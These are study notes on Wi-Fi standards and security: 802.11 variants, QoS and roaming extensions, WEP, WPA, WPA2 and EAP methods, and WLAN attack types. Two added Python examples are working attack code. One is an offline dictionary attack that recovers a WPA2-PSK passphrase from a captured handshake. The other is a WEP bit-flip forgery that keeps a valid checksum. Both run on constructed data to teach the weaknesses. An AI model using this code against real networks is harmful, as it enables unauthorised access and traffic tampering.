Taken from Webopedia, Wikipedia, the IEEE 802.11 standard, Data Over Wireless Networks by Gil Held (McGraw-Hill 2001), the Nortel VoIP Technologies book (Nortel Press 2008), and Pearson's CCNA Wireless 200-355 Complete Video Course. Frame formats and sequences need to be updated to reflect the additional security in 802.11a, 802.11g, WPA, WPA2, etc.
WiFi Specifications

  • Direct Sequence Spread Spectrum - the signal is spread by a chipping sequence; uses more bandwidth at a lower power density.
  • CSMA/CA (carrier sense multiple access/collision avoidance).
  • An ACK frame from the receiver (the AP, for client-to-AP traffic) indicates the frame was received and its FCS checked correctly. If no ACK arrives, the sender retransmits the entire frame.
  • Active Scanning - send a probe request, wait for a probe response from the AP.
  • Passive Scanning - listen for beacon frames from the AP.
  • Authentication
  • Association - info about the station and the capabilities of the BSS are exchanged.
  • Roaming - moving from one cell to another without losing the connection.
  • ISM band 2.4-2.4835 GHz. UNII bands 5-6 GHz.
  • Power limited to 100 mW (ETSI EIRP limit); ETSI also limits DSSS power density to -20 dBW/MHz and FHSS power density to -10 dBW/100 kHz.
  • Speeds of each standard downshift as you get farther away from the transmitting source (e.g. the AP).

Standards
802.11 1997. Original standard. 2.4-2.4835 GHz unlicensed (ISM) band. FHSS, DSSS and IR PHYs. Barker-11 spreading. BPSK/QPSK. Up to 2 Mbps.
802.11b 1999. 2.4-2.4835 GHz unlicensed (ISM) band. DSSS (HR/DSSS; FHSS is not part of 802.11b). Barker-11 spreading for 1 and 2 Mbps, CCK (Complementary Code Keying) for 5.5 and 11 Mbps. Rated at 1, 2, 5.5 and 11 Mbps; achieved throughput 4.3-6 Mbps. Range ~38 meters depending on environment. The Wi-Fi Alliance certifies DSSS interoperability as "Wi-Fi". Taken from Webopedia: "Not interoperable with 802.11a. Requires fewer access points than 802.11a for coverage of large areas. Offers high-speed access to data at up to 300 feet from base station. 14 channels (5MHz) available in the 2.4GHz band (only 11 of which can be used in the U.S. due to FCC regulations) with only three non-overlapping channels." The US typically uses channels 1, 6 and 11. Consider using different channels when you have neighboring APs. Each channel is 22 MHz wide (the 11 Mchip/s Barker spreading of the 1 MHz carrier occupies about 22 MHz) but channel centers are only 5 MHz apart, which is why adjacent channels overlap.
802.11a 1999. 5 GHz (4.915-5.825 GHz). OFDM (Orthogonal Frequency Division Multiplexing: the signal is split into sub-signals sent simultaneously on different subcarrier frequencies). BPSK/QPSK/16-QAM/64-QAM. Channel availability varies from country to country. Theoretical maximum rates of 6, 9, 12, 18, 24, 36, 48 and 54 Mbps; achieved throughput about 32 Mbps. Range: shorter than 802.11b. Taken from Webopedia: "Eight available channels. Less potential for RF interference than 802.11b and 802.11g. Better than 802.11b at supporting multimedia voice, video and large-image applications in densely populated user environments. Relatively shorter range than 802.11b. Not interoperable with 802.11b." Allows for 12 non-overlapping channels in the US (not all bands are available in all countries), so more APs can be co-located than with 802.11b/g.
802.11g 2003. 2.4 GHz unlicensed band. OFDM. BPSK/QPSK/16-QAM/64-QAM. Backwards compatible with 802.11b. Theoretical maximum rates of 6, 9, 12, 18, 24, 36, 48 and 54 Mbps (plus the 802.11b rates); achieved throughput about 32 Mbps. Cells are smaller than 802.11b because the allowed power is lower for OFDM.
  • To coexist with 802.11b, an 802.11g station sends RTS/CTS (carrying a Duration value) using 802.11b modulation before each OFDM data frame, so 802.11b stations reserve the medium. It can instead send only a 'CTS-to-self' (less clean). This protection helps 802.11b clients but costs 802.11g clients: perceived throughput drops from ~23 Mbps to ~8 Mbps.
  • In beacons, the ERP Information element carries the flags: Non-ERP (802.11b) station present in the cell yes/no, Use Protection yes/no.
Taken from Webopedia: "Improved security enhancements over 802.11. Compatible with 802.11b. 14 channels available in the 2.4GHz band (only 11 of which can be used in the U.S. due to FCC regulations) with only three non-overlapping channels." The US typically uses channels 1, 6 and 11. Consider using different channels when you have neighboring APs. When 802.11b clients are present, the protection frames (and any traffic to the 802.11b clients) fall back to CCK or Barker modulation and the whole cell slows down; 802.11g data frames themselves still use OFDM.
802.11n 2009. Focus is on features, not a band (works in both 2.4 GHz and 5 GHz).
  • Channel aggregation (40 MHz channels)
    • 128 subcarriers (vs. 64) for a 40 MHz aggregate channel; 14 null subcarriers (vs. 12) at the edges and center for calibration; 6 pilot subcarriers (vs. 4) for synchronization and tracking. Result: 108 data subcarriers (vs. 48 in 802.11a).
    • Cisco doesn't do channel aggregation in 2.4 GHz: not enough channels.
    • Only aggregate channel pairs that won't conflict with your neighbors (e.g. 36+40, not 40+44).
  • Block acknowledgements (one ACK for a burst of frames).
  • Short guard interval - reduced from 800 ns to 400 ns; vulnerable to multipath echoes.
  • MIMO - send and receive several useful signals (instead of discarding echoes). "Input" is into the antenna, "output" is from the antenna: SISO (single in, single out), SIMO (single in, multi out), MISO, MIMO. A radio chain is one radio plus its antenna; a spatial stream is one independent data stream. Sending symbols from one source across multiple streams and recombining them at the receiving end is spatial multiplexing.
    • Transmit beamforming (Cisco calls it ClientLink; based on the signal returned from the client) - form beams so the receiving station receives all parts of the MIMO transmission at the same time.
    • Or Maximal Ratio Combining - the receiving side synchronizes and combines the copies of the signal for a stronger signal.
    • Up to 4 streams; in practice the maximum is 3, and most handheld devices have 1 or 2 spatial streams to save battery.
  • Data rates for 64-QAM rate 5/6 (the top MCS for each stream count), in Mbit/s:
      Spatial streams   20 MHz, 800 ns GI   20 MHz, 400 ns GI   40 MHz, 800 ns GI   40 MHz, 400 ns GI
      1                 65                  72.2                135                 150
      2                 130                 144.4               270                 300
      3                 195                 216.7               405                 450
      4                 260                 288.9               540                 600
  • Protection now happens in the PHY header: the legacy preamble and header (carrying the duration) are modulated at a slow legacy rate so older stations can read them and defer, and the rest of the frame goes at the high HT rate.
Taken from Webopedia. An extension to 802.11 specification developed by the IEEE for wireless LAN (WLAN) technology. 802.11n builds upon previous 802.11 standards by adding multiple-input multiple-output (MIMO). The additional transmitter and receiver antennas allow for increased data throughput through spatial multiplexing and increased range by exploiting the spatial diversity (up to 4 streams) through coding schemes like Alamouti coding. The speed is 100 Mbit/s (even 250 Mbit/s in PHY level), and so up to 4-5 times faster than 802.11g. 802.11n also offers a better operating distance than current networks.
802.11ac. Only on 5 GHz. Up to 80 MHz or 160 MHz channels. Up to 8 spatial streams/radio chains (hard). Up to 256-QAM. Better management of the cell.
  • MU-MIMO - use otherwise idle antennas/radios to talk to another client at the same time. Downstream only.
    • 160 MHz-wide channel, 8-antenna AP with MU-MIMO support - best case, depending on the stations:
      • One 4-SS, 160 MHz client, 3.47 Gbps data rate, AT THE SAME TIME AS
      • One 2-SS, 160 MHz client, 1.73 Gbps data rate, AT THE SAME TIME AS
      • Two 1-SS, 160 MHz clients, 867 Mbps data rate each.
  • 256-QAM - needs a high-quality signal and SNR, so it only works very close to the AP. Because the constellation has so many points, the modulation rate is slowed down a little.
  • Protection: the legacy preamble/header is modulated at a slow rate, as in 802.11n. Channel width is protected too: the AP sends RTS duplicated on each 20 MHz subchannel of the wide channel, and the client answers CTS only on the subchannels it finds clear (dynamic bandwidth operation).
  • Wave 1 - 80 MHz, 3 SS, no MU-MIMO, 256-QAM optional
  • Wave 2 - 160 MHz, 4 SS, MU-MIMO, 256-QAM included
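Added example, written for this page rather than taken from any of the cited sources: the 802.11n rate table above and the 802.11ac MU-MIMO figures both follow from the OFDM parameters in these notes (data subcarriers per channel width, bits per subcarrier for the modulation, coding rate, and symbol time plus guard interval). The subcarrier counts and the 3.2 us symbol time are the standard values; the function and constant names are my own.

```python
# Added example (this page's editor, not code from any cited source): derive
# 802.11n/ac PHY data rates from the OFDM parameters quoted in the notes above.
#   rate = N_SS * N_SD * bits_per_subcarrier * coding_rate / (T_symbol + T_GI)
# Subcarrier counts and the 3.2 us symbol time are the standard values.
from fractions import Fraction

# Data subcarriers per spatial stream for each channel width
# (802.11n 20/40 MHz, 802.11ac 80/160 MHz).
DATA_SUBCARRIERS = {20: 52, 40: 108, 80: 234, 160: 468}
BITS_PER_SUBCARRIER = {"BPSK": 1, "QPSK": 2, "16-QAM": 4, "64-QAM": 6, "256-QAM": 8}
SYMBOL_US = Fraction(32, 10)  # useful OFDM symbol duration, 3.2 microseconds
CODING_5_6 = Fraction(5, 6)   # highest coding rate used by 802.11n/ac


def phy_rate_mbps(spatial_streams, width_mhz, modulation, coding_rate, guard_ns):
    """PHY data rate in Mbit/s, rounded to one decimal as the standard's tables do."""
    if width_mhz not in DATA_SUBCARRIERS:
        raise ValueError(f"unsupported channel width {width_mhz} MHz")
    bits_per_symbol = (spatial_streams * DATA_SUBCARRIERS[width_mhz]
                       * BITS_PER_SUBCARRIER[modulation] * Fraction(coding_rate))
    symbol_time_us = SYMBOL_US + Fraction(guard_ns, 1000)
    # bits per microsecond is the same as Mbit/s
    return round(float(bits_per_symbol / symbol_time_us), 1)


def ht_rate_table():
    """Reproduce the 802.11n table: {streams: (20/800, 20/400, 40/800, 40/400)} for 64-QAM 5/6."""
    return {
        nss: (
            phy_rate_mbps(nss, 20, "64-QAM", CODING_5_6, 800),
            phy_rate_mbps(nss, 20, "64-QAM", CODING_5_6, 400),
            phy_rate_mbps(nss, 40, "64-QAM", CODING_5_6, 800),
            phy_rate_mbps(nss, 40, "64-QAM", CODING_5_6, 400),
        )
        for nss in range(1, 5)
    }


def vht_example_rates():
    """The 802.11ac 160 MHz, 256-QAM 5/6, short-GI rates quoted in the MU-MIMO example."""
    return {nss: phy_rate_mbps(nss, 160, "256-QAM", CODING_5_6, 400) for nss in (1, 2, 4)}


if __name__ == "__main__":
    for nss, rates in ht_rate_table().items():
        print(nss, rates)
    print(vht_example_rates())
```

The same formula explains why a 40 MHz channel more than doubles the 20 MHz rate (108 data subcarriers versus 52, because the guard band between the two 20 MHz halves is reused) and why the short guard interval buys only about 11% (3.6 us versus 4.0 us per symbol).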
Taken from Wikipedia. Expected multi-station throughput of at least 1 Gbit/s and single-link throughput of at least 500 Mbit/s. Wider RF bandwidth (up to 160 MHz), more MIMO spatial streams (up to 8), downlink multi-user MIMO (up to 4 clients), high-density modulation (up to 256-QAM).
  • 80 MHz channel bandwidth, 160 MHz channel optional
  • Up to 8 spatial streams
  • 256-QAM
  • Beamforming
  • Coexistence between 802.11ac and 802.11a/n
  • 4 new fields in the PPDU header identifying the frame as VHT
802.11ad WiGig. 60 GHz millimeter-wave spectrum, up to 7 Gbit/s. 802.11aj rebands 802.11ad for the 45 GHz unlicensed spectrum available in some regions of the world (especially China).
802.11af White-Fi / Super Wi-Fi. Operates in the TV white space in VHF and UHF between 54 and 790 MHz. Uses cognitive radio technology to transmit on unused TV channels, limiting interference to regular analog/digital TV signals and wireless microphones. OFDM, based on 802.11ac. Increased range, and gets through brick/concrete better. 6, 7 or 8 MHz wide channels; up to 4 channels may be bonded. MIMO possible with up to 4 streams, using either space-time block coding or multi-user operation. One stream on one channel gives 26.7 Mbit/s (6 and 7 MHz channels) or 35.6 Mbit/s (8 MHz channels); 4 spatial streams and 4 bonded channels give a maximum data rate of 426.7 Mbit/s for 6 and 7 MHz channels and 568.9 Mbit/s for 8 MHz channels.
802.11ah. Sub-1 GHz license-exempt bands. Improved transmission range compared to conventional 802.11. Purposes include large-scale sensor networks, extended-range hotspots, and outdoor Wi-Fi for cellular traffic offloading.
802.11ax. Successor to 802.11ac; increases the efficiency of WLANs. Adds the 6 GHz range to the 2.4 GHz and 5 GHz ranges already in use; the Wi-Fi Alliance's marketing designates the 6 GHz part as Wi-Fi 6E. Uses orthogonal frequency-division multiple access (OFDMA), which is cellular technology applied to Wi-Fi. Better power-control methods to avoid interference with neighboring networks, higher-order 1024-QAM, uplink MU-MIMO added to the downlink MIMO and MU-MIMO to further increase throughput, plus power-consumption and security improvements such as Target Wake Time and WPA3 (required for Wi-Fi 6 certification).

Extensions
802.11e QoS over wireless LANs. Geared towards real-time applications like IP telephony. 4 classes - voice, video, best-effort, background. Allows the client to mark priority. Enhances PCF and DCF with HCCA and EDCA to define traffic categories. TCMA is a variation on CSMA/CA that uses a shorter arbitration interframe space (AIFS) for high-priority packets. EDCA Transmit Opportunity (TXOP): a bounded time interval during which a station can send as many frames as fit. A TXOP of 0 means a single MAC service data unit or MAC management protocol data unit. EDCA also has access categories (ACs); the contention window is set according to the AC of the packet.
Taken from Wikipedia: mapping of 802.1p priorities to 802.11e access categories.
      Priority   PCP   Acronym   Traffic Type            802.11e AC   Designation
      Lowest     1     BK        Background              AC_BK        Background
                 0     BE        Best Effort             AC_BE        Best Effort
                 2     EE        Excellent Effort        AC_BE        Best Effort
                 3     CA        Critical Applications   AC_VI        Video
                 4     VI        Video                   AC_VI        Video
                 5     VO        Voice                   AC_VO        Voice
                 6     IC        Internetwork Control    AC_VO        Voice
      Highest    7     NC        Network Control         AC_VO        Voice
HCCA - within each beacon interval the contention-free period (CFP) and the contention period (CP) alternate. A Controlled Access Phase (CAP) is initiated whenever the AP (acting as Hybrid Coordinator, HC) wants to send or receive a frame contention-free. Traffic Classes and Traffic Streams are defined. The HC can give priority to one station over another depending on the station's queue information. Priority can also be given using TXOP.
802.11k Limits scanning needs: the AP can return a neighbor report with the channels of neighboring APs.
802.11p Wireless for car-to-car communications.
802.11r Roaming speedup. Designed to speed handoffs between access points or cells in a wireless LAN. Makes sure QoS and security are in place before the transition to the new AP.
  • Pre-negotiate QoS and credentials on the new AP before leaving the old one.
802.11s IEEE standard for wireless mesh networks of Wi-Fi APs. A wireless mesh uses a radio to interconnect the access points and routes wireless packets over the best available path. Mesh benefits include potentially higher performance and more reliable networks.
802.11u Hotspot 2.0 (Passpoint) - describes how a station can discover services before associating: free Wi-Fi or private, Internet access, "can you connect me to my cellular ISP's secure server?" Automates authentication with EAP-SIM/WPA2.
802.11v BSS Transition Management (better than 802.11k alone): the AP returns a list of neighbors to roam to and can steer the client.
802.11w Protected Management Frames: deauthentication, disassociation and action frames get a MIC (and unicast ones are encrypted) keyed from the session keys, so an attacker who is not on the network can no longer forge deauthentication frames. Only helps when both AP and client support it and it is configured as required rather than optional.
802.11ai Faster initial link setup.
802.11aq Enables pre-association discovery of services. Extends the mechanisms in 802.11u to discover services running on a device or provided by a network.

Security
WEP Obsolete security scheme.
  • RC4 stream cipher for confidentiality
  • CRC-32 checksum for integrity.
  • 64-bit WEP uses a 40-bit key and a 24-bit initialization vector (IV). The 24-bit IV is too short: it repeats after at most 2^24 frames (in practice far sooner), and a repeated IV means a reused RC4 keystream, so XORing two ciphertexts gives the XOR of the two plaintexts.
  • 128-bit WEP with a 104-bit key was put in place after US government export restrictions were lifted. Key size turned out not to be the issue with this standard: RC4 key-scheduling weaknesses (the FMS attack and later statistical attacks on the IV||key input) recover the key from captured frames regardless of key length, and the linear CRC-32 ICV lets an attacker modify ciphertext undetected.
WPA
  • Wi-Fi Protected Access (based on 802.11i draft v4, 2002).
  • RC4 stream cipher, 128-bit key, longer (48-bit) IV / sequence counter.
  • 'Michael' Message Integrity Code (MIC) instead of CRC for integrity. Michael is deliberately cheap (about 20 bits of security), so TKIP adds countermeasures: two MIC failures within 60 seconds trigger rekeying and a 60-second shutdown.
  • TKIP - dynamically changes keys as the system is used, so every data packet is sent with its own per-packet key (mixed from the temporal key, the transmitter address and the sequence counter). Detects whether a packet has been damaged or altered using the Michael MIC. Makes sure packets arrive in sequence using the sequence counter (incremented by one for each packet; when the key changes, the counter goes back to zero), which also blocks replay. Combined with the larger IV, this defeats the key-recovery attacks on WEP.
  • 802.1X or (weaker) pre-shared key. The PSK is shared by every device, and anyone who captures the 4-way handshake can guess passphrases offline.
  • Put in place because the WPA2 work was taking longer than anticipated.
802.11i (published 2004)
WPAv2
Updated security standard. Interoperable implementations are called WPA2 by the Wi-Fi Alliance. Supersedes WEP and WPA, which have demonstrated security weaknesses.
  • AES block cipher (128-bit block; CCMP uses a 128-bit key, although AES itself also supports 192- and 256-bit keys)
  • CCMP: AES in CCM mode - counter mode for confidentiality plus CBC-MAC for integrity (the MIC). A 48-bit packet number replaces the IV and prevents replay.
  • 802.1X
  • TKIP not recommended, but allowed for transition. The Wi-Fi Alliance says don't use it.
  • PSK or 802.1X/EAP
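Added example (my own code, not from 802.11i or any of the cited sources) of the key hierarchy this section describes: PBKDF2 turns the passphrase and SSID into the PMK; the addresses and nonces of the 4-way handshake expand it into the PTK, whose KCK authenticates the handshake messages; and the same computation run over a wordlist is the offline attack that makes PSK the weaker option. The MAC addresses, nonces, EAPOL-Key frame and candidate list are constructed test data; the PMK for "password"/"IEEE" is the test vector from the 802.11i annex.

```python
# Added example (this page's editor, not code from any cited source):
# WPA2-PSK key derivation and why a captured 4-way handshake is enough for an
# offline dictionary attack. All addresses, nonces and frames are constructed.
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), per 802.11i."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max of the addresses and nonces).

    Returns (KCK, KEK, TK): KCK authenticates the handshake, KEK wraps the GTK,
    TK encrypts data (CCMP). min/max ordering gives both sides the same PTK.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return ptk[:16], ptk[16:32], ptk[32:48]


MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8  # byte offset of Key MIC in an EAPOL-Key frame


def build_eapol_key_msg2(snonce, key_data=b""):
    """Constructed EAPOL-Key message 2 (RSN descriptor); the MIC field is left zeroed."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1 MIC), pairwise, MIC present
    body = (
        b"\x02"                       # descriptor type: RSN
        + struct.pack(">H", key_info)
        + struct.pack(">H", 0)        # key length (0 in message 2)
        + struct.pack(">Q", 1)        # replay counter
        + snonce                      # 32-byte SNonce
        + bytes(16)                   # key IV (unused for CCMP)
        + bytes(8)                    # key RSC
        + bytes(8)                    # reserved
        + bytes(16)                   # key MIC, zero while the MIC is computed
        + struct.pack(">H", len(key_data))
        + key_data                    # a real message 2 carries the RSN IE here
    )
    return b"\x01\x03" + struct.pack(">H", len(body)) + body  # 802.1X v1, type EAPOL-Key


def eapol_mic(kck, eapol_frame):
    """WPA2 key MIC: HMAC-SHA1 over the frame with the MIC field zeroed, first 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def offline_dictionary_attack(ssid, aa, spa, anonce, snonce, eapol_frame, captured_mic, candidates):
    """What a handshake cracker does: 4096 HMAC-SHA1 rounds per guess, nothing sent on the air."""
    for candidate in candidates:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck, _, _ = ptk_from_pmk(pmk, aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None


def demo():
    """AP and STA derive matching keys; an eavesdropper recovers the weak passphrase offline."""
    ssid, passphrase = "IEEE", "password"          # weak on purpose; also the 802.11i test vector
    aa = bytes.fromhex("001122334455")             # constructed AP (authenticator) address
    spa = bytes.fromhex("66778899aabb")            # constructed STA (supplicant) address
    anonce = hashlib.sha256(b"anonce").digest()    # constructed nonces (a real AP uses a CSPRNG)
    snonce = hashlib.sha256(b"snonce").digest()
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck_ap, _, tk_ap = ptk_from_pmk(pmk, aa, spa, anonce, snonce)
    kck_sta, _, tk_sta = ptk_from_pmk(pmk, spa, aa, snonce, anonce)  # STA's argument order
    keys_match = kck_ap == kck_sta and tk_ap == tk_sta
    msg2 = build_eapol_key_msg2(snonce)
    mic = eapol_mic(kck_sta, msg2)                 # what the STA transmits in message 2
    recovered = offline_dictionary_attack(ssid, aa, spa, anonce, snonce, msg2, mic,
                                          ["letmein", "Password1", "password", "wifi1234"])
    return pmk.hex(), keys_match, recovered


if __name__ == "__main__":
    print(demo())
```

Everything the attacker needs (SSID, both addresses, both nonces, message 2 with its MIC) is in the clear in the beacon and the first two handshake frames, which is why a long random passphrase, or 802.1X with per-user credentials, is the only real defence for PSK networks. WPA3-SAE replaces this PBKDF2-only derivation with a password-authenticated key exchange so that a captured handshake no longer permits offline guessing.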
802.1X Port-based access control to the network at layer 2. Users are not allowed onto the network until they are authenticated. Uses one of the EAP methods to authenticate; the authenticator (AP or switch) relays EAP between the supplicant and a RADIUS server.
WISPr (Wireless Internet Service Provider roaming) - allows users to roam between wireless Internet service providers.
EAP
Extensible Authentication Protocol
  • LEAP - Lightweight Extensible Authentication Protocol - Cisco-specific. Crackable offline from a captured exchange (it rests on MS-CHAP), though Cisco claims it is secure if sufficiently complex passwords are used.
  • EAP-TLS - IETF open standard (RFC 5216). Uses TLS (Transport Layer Security) with PKI against a RADIUS authentication server. Client-side certificates are needed, so it can be hard to deploy. Most widely supported standard. Only weakness is that the username (outer identity) is passed from the client in the clear before the certificates are exchanged.
    Supplicant                      Authenticator                Auth Svr
               ------EAP Start----->
               <--Identity Request--
               --Identity Response->            --------------->
               <-Server Certificate-            <---------------
               --Client Certificate>            --------------->
               <----EAP Success----             <--Access-Accept + PMK--
    (derive PMK from TLS master secret)                (derive PMK from TLS master secret)

  • EAP-MD5 - IETF open standard. MD5 challenge/response is vulnerable to dictionary attacks. Does not derive keys, so no dynamic WEP/WPA keys. The client has no way to authenticate the server. The challenge string is sent to the client in the clear.
  • EAP-POTP - Protected One-Time Password (RFC 4793) - developed by RSA Laboratories, uses one-time password (OTP) tokens to generate authentication keys. Provides two-factor user authentication: the user needs physical access to the token and knowledge of the PIN to authenticate.
  • EAP-PSK - Pre-shared key (RFC 4764) - provides a protected communication channel once mutual authentication succeeds. Lightweight and extensible EAP method that does not require any public-key cryptography. 4-message exchange.
  • EAP-PWD - shared password used for authentication (RFC 5931). A low-entropy password drawn from a dictionary may be used; the underlying key exchange (a PAKE, the same Dragonfly exchange used by WPA3-SAE) is resistant to active, passive and offline dictionary attacks. Supported by Android 4.0+, FreeRADIUS, Radiator, hostapd and wpa_supplicant.
  • EAP-TTLS/MSCHAPv2 - Funk Software/Certicom - IETF open standard (RFC 5281). Good security. PKI certificate only on the authentication server; the client must validate that certificate, or the inner MSCHAPv2 exchange can be harvested by a rogue AP.
  • EAP-IKEv2 - based on the Internet Key Exchange protocol v2 (RFC 5106) - provides mutual authentication and session key establishment between peer and server. Authentication techniques can be asymmetric key pairs, passwords or symmetric keys. It is possible to use different credentials/techniques in each direction.
  • EAP-FAST - replacement for LEAP while keeping a lightweight implementation. Uses a Protected Access Credential (PAC) to establish a TLS tunnel in which the client credentials are verified. The PAC can be intercepted during anonymous in-band provisioning and compromise the user credential; mitigated by manual PAC provisioning or by using server certificates for the provisioning phase. A PAC file is issued per user.
    • Phase Zero - done in advance. The server gives the client a locked box with a key inside (the PAC-Opaque, readable only by the server) and the same key outside the box (the PAC-Key). The PAC contains the server ID, the opaque key/password and the clear key/password.
    • Phase One - the client comes back and presents the locked box; client and server build the TLS tunnel from the PAC-Key.
    • Phase Two - inside the tunnel, exchange Identity Request and Response. The client sends its credentials to the server; the server returns session keys.
    Supplicant                      Authenticator                Auth Svr
               ------EAP Start----->
               <--Identity Request--
               --Anonymous ID resp->            --------------->
               <------Auth-ID-------            <---------------
               -----PAC-Opaque----->            --------------->
               (TLS tunnel established with the PAC-Key)
               <--Identity Request--            <---------------
               --Identity Response->            --------------->
               -----Credentials---->            --------------->
               <----EAP Success----             <--Access-Accept + PMK--
    (gen PMK)                                                  (gen PMK)
  • PEAPv0/EAP-MSCHAPv2 - Cisco/Microsoft/RSA - open standard (Internet Draft). Good security. Similar to EAP-TTLS. Only requires a server-side PKI certificate. Usually what people mean by "PEAP". Second most commonly supported form of EAP. The outer identity sent in the clear is normally an anonymous placeholder; the real username and the MSCHAPv2 exchange travel inside the TLS tunnel. Caveat: the supplicant must be configured to validate the server certificate (trusted CA and expected server name). A client that accepts any certificate will happily run MSCHAPv2 with an evil-twin AP, and the captured challenge/response can be cracked offline.
    Supplicant                      Authenticator                Auth Svr
               ------EAP Start----->
               <--Identity Request--
               --Anonymous ID resp->            --------------->
               <-Server Certificate-            <---------------
               --Pre-Master Secret->            --------------->
               (TLS tunnel established)
               <--Identity Request--            <---------------
               --Identity Response->            --------------->
               -----Credentials---->            --------------->
               <----EAP Success----             <--Access-Accept + PMK--
    (gen PMK)                                                  (gen PMK)
  • PEAPv1/EAP-GTC - Cisco - alternative to PEAPv0/EAP-MSCHAPv2. Uses an inner authentication protocol other than (Microsoft's) MSCHAPv2. Microsoft doesn't support PEAPv1.
  • EAP-FASTv1 - inner GTC
  • EAP-FASTv1a - inner MSCHAPv2 or TLS
  • EAP-SIM - authentication and session key distribution using GSM SIMs.
  • EAP-AKA - authentication and session key distribution using UMTS SIMs (USIM).
  • EAP-AKA' - variant of EAP-AKA (RFC 5448) with SHA-256-based key derivation that binds the keys to the access network name; used for 3GPP LTE/Wi-Fi interworking.
  • EAP-GTC - Generic Token Card (RFC 2284 and RFC 3748) - meant as an alternative to PEAPv0/EAP-MSCHAPv2. Carries a text challenge from the authentication server; the reply is generated by a security token. The response travels in the clear, so only use it inside a protected tunnel (PEAP or EAP-FAST).
  • EAP-EKE - Encrypted Key Exchange (RFC 6124) - provides secure mutual authentication using short passwords and no public-key certificates. 3-round exchange based on a Diffie-Hellman variant.
IPSec Use IPSec over the WLAN, especially ESP, as an extra layer when the link-layer security is weak.

Hacking Tools

Hacking tools can listen on the air and gain access to the following info:
  • MAC address of the AP
  • SSID
  • Manufacturer (from the OUI in the MAC address)
  • Channel it was heard on
  • WEP enabled (yes/no), and which cipher and authentication suites the RSN element advertises
  • Signal strength and signal-to-noise ratio
DON'T USE DEFAULT SETTINGS.

CONSIDER NOT ATTACHING A WLAN INSTALLATION DIRECTLY TO YOUR WIRED INSTALLATION.

Types of WLAN attacks

  • Active attacks
  • DoS
  • DDoS
  • Impersonation - use a spoofed MAC address
  • Jamming - generate a signal strong enough that WLAN clients and APs can no longer hear each other.
  • Man-in-the-middle - generate a stronger AP signal (an evil twin with the same SSID) and users are forced to roam to it
  • Modification and insertion - modify a packet and get the CRC correct (works against WEP because CRC-32 is linear)
  • Passive attacks - eavesdrop. What isn't encrypted...?
  • Stealing bandwidth - use the network for access.
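Added example (my own code, not from a cited source) for the "modification and insertion" attack above and the CRC-32 weakness noted in the WEP section: because CRC-32 is linear under XOR and RC4 is a stream cipher, an attacker who can guess the plaintext layout can flip chosen bits in the ciphertext and patch the encrypted ICV so the receiver's check still passes, all without the key. Key, IV and plaintext are constructed; RC4 is inlined so the script needs only the standard library.

```python
# Added example (this page's editor, not code from any cited source): the WEP
# bit-flip attack. CRC-32 is linear, so crc(P ^ D) == crc(P) ^ crc(D) ^ crc(zeros),
# and RC4 is a stream cipher, so XOR on ciphertext is XOR on plaintext.
import zlib


def rc4(key, data):
    """Plain RC4 (KSA + PRGA) as WEP uses it; returns data XOR keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32_le(data):
    """WEP ICV: CRC-32 of the plaintext, little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, plaintext):
    """WEP frame body: IV || RC4(IV || key, plaintext || ICV)."""
    return iv + rc4(iv + key, plaintext + crc32_le(plaintext))


def wep_decrypt(key, frame):
    """Return (plaintext, icv_ok) the way a receiver would."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + key, body)
    plaintext, icv = clear[:-4], clear[-4:]
    return plaintext, icv == crc32_le(plaintext)


def flip_bits_keeping_icv(frame, delta):
    """Attacker's step: XOR `delta` into the encrypted payload and fix the encrypted ICV.

    No key or keystream knowledge is needed; `delta` must cover the whole payload
    (use zero bytes where nothing should change).
    """
    iv, body = frame[:3], frame[3:]
    enc_payload, enc_icv = body[:-4], body[-4:]
    if len(delta) != len(enc_payload):
        raise ValueError("delta must be as long as the encrypted payload")
    icv_delta = xor_bytes(crc32_le(delta), crc32_le(bytes(len(delta))))
    return iv + xor_bytes(enc_payload, delta) + xor_bytes(enc_icv, icv_delta)


def demo():
    """Change a field in an encrypted request without the key; the receiver sees a valid ICV."""
    key = b"\x01\x02\x03\x04\x05"   # constructed 40-bit WEP key
    iv = b"\x11\x22\x33"            # constructed IV
    original = b"GET /balance?acct=1111 HTTP/1.0"
    frame = wep_encrypt(key, iv, original)
    # The attacker only needs to know (or guess) the plaintext layout, not its key.
    target = b"GET /balance?acct=2222 HTTP/1.0"
    tampered = flip_bits_keeping_icv(frame, xor_bytes(original, target))
    return wep_decrypt(key, tampered)


if __name__ == "__main__":
    print(demo())
```

The fix in WPA/WPA2 is a keyed integrity check (Michael in TKIP, CBC-MAC in CCMP): with a keyed MIC the attacker cannot compute the correction term for the integrity field, so the flipped frame is rejected.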

Wireless Protection

  • Do not connect the WLAN directly to the wired LAN. Put a firewall or security switch between them.
